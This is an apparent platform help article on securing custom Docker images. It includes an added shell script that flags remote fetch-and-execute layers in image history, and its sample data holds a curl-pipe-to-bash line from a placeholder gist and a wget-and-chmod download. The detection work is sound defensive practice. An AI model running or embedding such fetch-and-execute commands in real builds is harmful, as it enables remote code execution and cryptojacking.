Creating safe and secure custom Docker images

Allie Hajian

If you are bringing your own Docker image, please consider the following security advisory.

If you are basing your image on anything other than Terra Base Images, you have to decide whether you trust the provider of that image. Building on somebody else's work may look like a time saver, but it is a risk. From a security point of view, there are better paths to a safe and secure custom Docker image than simply pulling an image you have not reviewed.

What's the risk of a third-party image?

Because anyone can publish an image on Docker Hub, a third-party container may contain malware or insecure software, or may ship with insecure settings. One possible result is cryptojacking: for example, a malicious actor stores malicious code as a GitHub gist and then uses RUN curl to fetch and execute it when the container is built. See this Example of a malicious image in Dockerhub.

Best practices 

Limit packages: Because every package adds attack surface, don't install unnecessary packages in your containers.

Recreate from scratch with the third-party image as a template: Inspect the Dockerfile and include only the parts you have reviewed and trust. Note that auditing a Dockerfile can sometimes take as long as configuring the image yourself.

Publishing your own images, public versus non-public: Your Docker image does not have to be public if you use GCR (Google Container Registry). If you use Docker Hub, however, the Docker image needs to be public.
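To make the audit in "Recreate from scratch" concrete, here is an added example (not part of this article and not Terra's own tooling) that scans an image's build history for layers that download and execute remote content at build time, the RUN curl pattern described above. It assumes the history comes from docker history --no-trunc --format '{{.CreatedBy}}' IMAGE; the history lines embedded below are constructed so the check runs offline.

```shell
#!/bin/sh
# Added example for this article (not Terra's code): audit an image's build
# history for layers that download and execute remote content at build time.
# Real usage:  docker history --no-trunc --format '{{.CreatedBy}}' IMAGE | audit_layers
# The sample history below is constructed so the check runs offline.

# Layers considered suspicious: a fetch tool piped into a shell, a GitHub gist
# URL, or a fetch followed by chmod +x on the downloaded file.
REMOTE_EXEC_RE='(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh|gist\.github(usercontent)?\.com|(curl|wget).*&&.*chmod[[:space:]]+\+?x'

# Read history lines on stdin; print the matching ones with a SUSPICIOUS: prefix.
# Exit status 0 means no suspicious layer was found, 1 means at least one was.
audit_layers() {
    hits=0
    while IFS= read -r layer; do
        if printf '%s\n' "$layer" | grep -E -q -e "$REMOTE_EXEC_RE"; then
            printf 'SUSPICIOUS: %s\n' "$layer"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]
}

# Same check, but print only the number of suspicious layers (0 when clean).
count_remote_exec() {
    n=$(grep -c -E -e "$REMOTE_EXEC_RE") || true
    printf '%s\n' "${n:-0}"
}

# Constructed history of a hypothetical third-party image (newest layer first).
# The gist URL and hostnames are placeholders, not real locations.
SAMPLE_HISTORY='/bin/sh -c #(nop)  CMD ["bash"]
/bin/sh -c wget -O /tmp/tool https://example.invalid/tool && chmod +x /tmp/tool
/bin/sh -c curl -fsSL https://gist.githubusercontent.com/EXAMPLE-USER/EXAMPLE-ID/raw/setup.sh | bash
/bin/sh -c apt-get update && apt-get install -y python3
/bin/sh -c #(nop) ADD file:placeholder in /'

# Run the audit on the sample; a non-zero status is the signal to rebuild from
# a trusted base instead of pulling this image.
printf '%s\n' "$SAMPLE_HISTORY" | audit_layers || echo "audit failed: rebuild from a trusted base"
```

The pattern list is a heuristic, not a complete scanner: a layer that passes it still deserves the manual Dockerfile review the article recommends.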

Using Terra base images

Terra base images are curated, trusted images. You can learn more about how to create a custom image using our base images here.
